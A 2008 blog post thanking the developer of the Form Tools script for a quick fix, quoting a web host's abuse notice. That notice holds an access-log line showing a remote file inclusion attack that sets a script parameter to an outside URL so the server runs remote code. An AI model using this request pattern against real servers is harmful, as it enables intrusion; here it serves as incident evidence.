Form Tools we salute you!

29 Feb

Posted by admin as Tech Blog

We have been using Form Tools (a genergic form processing, storage and access script) for just over 6 months to process the data from all of our various feedback forms and corrolate it in one central database. Everything was working fine with the script until i got an email from my webhosts…

From: <abuse-team@1and1.com>
To: <ralph [at] thorntonconsultancy.co.uk>
Sent: Friday, February 22, 2008 10:41 AM
Subject: C######### - 1&1 Internet Compliance

Dear Ralph Thornton, (Customer ID: #########)

It has come to our attention that your web space has been hacked:

125.162.168.131 - - [15/Feb/2008:12:12:08 +0100] “POST /####//g#####/templates/admin_page_open.php?g_root_dir=http://www.troske n.com/sky?? HTTP/1.1″ 200 212394 www.thorntonconsultancy.co.uk “http://www.thorntonconsultancy.co.uk/####//g#####/templates/admin_page_op en.php?g_root_dir=http://www.trosken.com/sky??” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3″ “-”

–

The above was taken from your access logs. It shows that /members//global/templates/admin_page_open.php was used to perpetrate the hack.

Please contact the developers for this script/application. You will likely need to install a version update and/or security patch to prevent further abuse.

Also, reply to this email in acknowledgement of this issue. Failure to do so can result in your account being locked and possibly terminated.

–
Sincerely,
Robin Klingsberg
Customer Compliance Operative
1&1 Internet Inc.

First of all I was amazed at 1&1 actually picking up a vunrability in a script I was using, now don’t get me wrong there not a bad webhost but sometimes there tech support can be weak at best, so it was a suprise that they pro-actively monitor for attempted hacks! But then I realised this could cause some damage to my data so I immediately posted up the message I had recieved on Form Tools support forum, I wasn’t really expecting a response as this is a free script coded by a full time employed programmer. But to my suprise, within a couple of hours of me making the post the developer, Benjamin Keen, sent me an email to address the vunrability in his script and offer his support to get it resolved.

I immediately took Ben up on his offer and after a couple of emails backwards and forwards he got the issue resolved for me. I’m just writing this post to show the world that there are developers out there that produce first class applications for free and support them better than most paid programmes. Ben Keep up the good work and I hope to see more scripts from you in the future.

One Response

Ben Keen

March 1st, 2008 at 1:06 am
1

You’re very welcome.

Whenever I get wind of potential security problems I always get a little nervous - they’re obviously top priority to get resolved fast. Ordinarily they’re false alarms, but your web host was quite right in identifying this one.

Thanks to your email, I’ll be releasing an update to the script this weekend.

Thanks, Ralph!!

RSS feed for comments on this post · TrackBack URI

Thornton Consultancy - Affiliate Blog

Form Tools we salute you!

One Response

Leave a reply

Categories

Archives

Links